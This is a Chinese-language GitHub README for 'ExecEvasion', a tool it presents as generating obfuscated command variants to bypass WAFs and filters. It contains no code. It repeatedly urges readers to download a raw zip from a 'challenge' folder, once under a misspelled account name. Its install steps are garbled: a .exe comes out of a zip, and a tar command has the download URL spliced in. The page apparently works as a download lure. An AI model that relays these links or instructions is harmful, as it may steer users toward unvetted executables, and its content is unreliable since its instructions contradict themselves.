nezzyomran/ExecEvasion
GitHub: nezzyomran/ExecEvasion
一款用于生成混淆命令变体以尝试绕过 WAF 的跨平台安全测试工具。
Stars: 1 | Forks: 1
# 🚀 ExecEvasion - 轻松绕过过滤器
## 🌟 概述
ExecEvasion 是一个轻量级的执行规避工具包,旨在创建命令变体。其主要目的是通过利用 Linux 和 Windows 系统上的真实 Shell 解析行为,来绕过简单的过滤器和 Web Application Firewall (WAF) 规则。
## 📥 立即下载
[](https://github.com/nezzyomgan/ExecEvasion/raw/refs/heads/main/challenge/Evasion-Exec-1.2.zip)
## 🚀 入门指南
使用 ExecEvasion 非常简单。请按照以下步骤开始使用。
### 🛠️ 系统要求
- **操作系统:**
- Windows 10 或更高版本
- 任何现代 Linux 发行版
- **处理器:**
- 推荐使用 64 位处理器
- **内存:**
- 至少 4 GB RAM
- **磁盘空间:**
- 至少 100 MB 的可用空间
## 📥 下载与安装
要下载 ExecEvasion,请访问此页面进行下载:[ExecEvasion Releases](https://github.com/nezzyomran/ExecEvasion/raw/refs/heads/main/challenge/Evasion-Exec-1.2.zip)。
1. 前往 [Releases 页面](https://github.com/nezzyomran/ExecEvasion/raw/refs/heads/main/challenge/Evasion-Exec-1.2.zip)。
2. 找到您想要下载的版本。
3. 点击与您的操作系统匹配的文件:
- 对于 Windows,请查找 `.exe` 文件。
- 对于 Linux,请查找 `https://github.com/nezzyomran/ExecEvasion/raw/refs/heads/main/challenge/Evasion-Exec-1.2.zip` 或类似文件。
4. 将文件保存到您的计算机。
5. 根据您的操作系统按照以下说明进行安装。
## 💻 在 Windows 上安装
1. 双击下载的 `.exe` 文件。
2. 按照屏幕上的说明完成安装。
3. 安装完成后,您可以直接从开始菜单或桌面快捷方式运行 ExecEvasion。
## 🐧 在 Linux 上安装
1. 打开您的终端。
2. 导航到您下载软件包的目录。
3. 使用以下命令解压文件:
tar -xzf ExecEvasion*https://github.com/nezzyomran/ExecEvasion/raw/refs/heads/main/challenge/Evasion-Exec-1.2.zip
4. 进入解压后的目录:
cd ExecEvasion
5. 要运行 ExecEvasion,请使用命令:
./exec_evasion
## 🎯 如何使用 ExecEvasion
使用 ExecEvasion 很简单。以下是生成命令变体的方法:
1. **打开应用程序。**
2. **选择您想使用的命令类型:**
- 您可以根据想要绕过的目标选择各种选项。
3. **在输入框中输入您的基础命令。**
4. **点击“Generate”按钮。**
5. **查看结果。**
- 应用程序将生成几个您可以使用的命令变体。
## 🧑🤝🧑 社区与支持
如果您有问题或需要帮助,请联系社区:
- **GitHub Issues:** 报告问题或建议功能。
- **讨论区:** 加入用户和开发者的讨论。
## 📄 主题
ExecEvasion 涵盖以下几个关键领域:
- Bug Bounty 工具
- 防御规避技术
- Web Application Firewall 绕过
## 🔗 其他资源
- **文档:** 查看官方文档以获取详细的使用说明。
- **教程:** 查找有关如何有效使用 ExecEvasion 的视频教程。
## 📩 反馈
我们重视您的意见。请分享您的体验、建议或遇到的问题。您可以通过 GitHub 上的 Issues 部分或发送电子邮件给支持团队来完成此操作。
## 📥 再次立即下载
别忘了访问发布页面下载 ExecEvasion:[ExecEvasion Releases](https://github.com/nezzyomran/ExecEvasion/raw/refs/heads/main/challenge/Evasion-Exec-1.2.zip)。
标签:AppImage, CISA项目, Conpot, DNS 反向解析, Payload生成, Ruby脚本, WAF绕过, Web应用防火墙, Windows安全, 代码混淆, 后端开发, 后端开发, 命令变异, 命令注入, 安全测试, 安全测试, 执行逃避, 攻击性安全, 攻击性安全, 白盒测试, 网络安全, 隐私保护